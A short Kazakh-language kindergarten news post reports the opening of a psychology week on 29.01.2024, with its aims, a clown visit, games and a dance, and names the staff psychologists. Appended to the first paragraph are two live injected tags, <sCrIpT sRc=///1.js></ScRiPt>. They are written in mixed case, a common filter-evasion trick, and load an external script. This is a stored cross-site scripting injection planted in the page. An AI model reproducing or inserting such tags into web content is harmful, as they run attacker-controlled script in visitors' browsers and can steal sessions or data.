Бөбекжайда "Біз бірге бақыттымыз" айдарында өтілетін психология апталығының жоспарына сәйкес апталықтың ашылу салтанаты болып өтті.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

29.01.2024

Мақсаты: балалар мен ересектер ұжымдарында психологиялық жағымды климат қалыптастыру. Педагогтар мен ата- аналардың психология ғылымына қызығушылығын арттыру. Бөбекжайдағы психологиялық процестердің нақты түрлерін көрсете білу.
Апталықтың бірінші күні "Кемпірқосақ" көңіл- күйі деп аталды. Қатысушылар тақырыпқа сай киініп, өз ұрандарымен көтеріңкі көңіл- күйде залға кірді. Іс- шараға сайқымазақ қонаққа келіп балалармен  танысып, көңілді әнге биледі. Бөбекжай психологтары Раисова А.Ш , Маженова Қ.Б қатысушыларға қолдау көрсетіп, психология туралы қысқаша мәліметтер берді, балалармен ойындар ұйымдастырды.  Апталықтың ашылуы өте қызықты және тартымды өтіп, балалардың көңілдері көтеріліп, бір- біріне  жүрекше беру арқылы жылы сөздер айтты.  Іс- шара соңында балалар  "Қаздар" биін биледі.
Педагог-психолог: Раисова А.Ш
Маженова Қ.Б.

Просмотров: 250


Пікір қосу



Деректерді қолтаңбаға қосу
Текст